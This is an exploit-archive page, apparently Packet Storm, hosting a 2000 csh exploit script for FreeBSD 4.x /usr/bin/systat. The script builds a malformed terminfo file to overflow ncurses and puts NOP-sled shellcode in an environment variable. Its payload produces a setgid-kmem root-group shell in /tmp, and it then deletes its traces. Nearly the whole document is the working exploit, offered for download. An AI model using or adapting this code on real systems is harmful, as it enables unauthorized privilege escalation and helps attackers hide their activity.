exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

freebsd-systat.c

freebsd-systat.c
Posted Oct 11, 2000
Authored by Venglin

FreeBSD 4.X local /usr/bin/systat exploit. Gives a sgid kmem shell by exploiting the .terminfo bug in ncurses.

tags | exploit, shell, local
systems | freebsd
SHA-256 | 74912457abcb06d1b3486b0919890ed721d24f2ed15b58307dd60bb46c085361

freebsd-systat.c

Change Mirror Download
#!/bin/csh

##############################################################################
# (c) 2000 Przemys³aw Frasunek <venglin@freebsd.lublin.pl> #
# #
# FreeBSD 4.x systat (gid=kmem) trivial exploit #
# Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI> #
# #
# Dedicated to ksm. #
# #
# Nudzi³o mi siê w szkole, tote¿ napisa³em sploita na angielskim. :) #
##############################################################################

cat << __EOF__ > /tmp/xx
#!/bin/csh

cp /bin/sh /tmp
/usr/bin/chgrp kmem /tmp/sh
chmod 2755 /tmp/sh
__EOF__

chmod 755 /tmp/xx

cat << __EOF__ > /tmp/sploitte.c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>

#define OFF -400
#define ALIGN 516

long getesp(void)
{
__asm__("movl %esp, %eax\n");
}

int main(void)
{
/* precompiled malformed terminfo header */

char evilcap[] =
"\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
"\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
"\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
"\x6d\x69\x6e\x61\x6c";

char retbuf[5];
long ret = getesp() + OFF;
int i;

/* creating ~/.terminfo/s/screen precompiled binary */

write(2, evilcap, sizeof(evilcap)-1);
for (i=0;i<39;i++) write(2, "\0", 1);
for (i=0;i<86;i++) write(2, "\xff", 1);
write(2, "\0\0", 2);
for (i=0;i<750;i++) write(2, "\xff", 1);
for (i=0;i<ALIGN;i++) write(2, "a", 1);
sprintf(retbuf, "%c%c%c%c", ((int)ret & 0xff),
(((int)ret & 0xff00) >> 8),
(((int)ret & 0xff0000) >> 16),
(((int)ret & 0xff000000) >> 24));
write(2, retbuf, 5);
}
__EOF__

# creating terminfo binary

cc -o /tmp/s /tmp/sploitte.c
cd $HOME
mkdir -p .terminfo/s
setenv TERM screen
/tmp/s >& .terminfo/s/screen

# shellcode goes to env. plenty of nops are used, so usually adjusting offset
# isn't needed.

setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`

# boom.

/usr/bin/systat >& /dev/null

# clean me up.

rm -f .terminfo/s/screen
rm -f /tmp/xx /tmp/s /tmp/sploitte.c

# your setgid shell :)

ls -la /tmp/sh
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close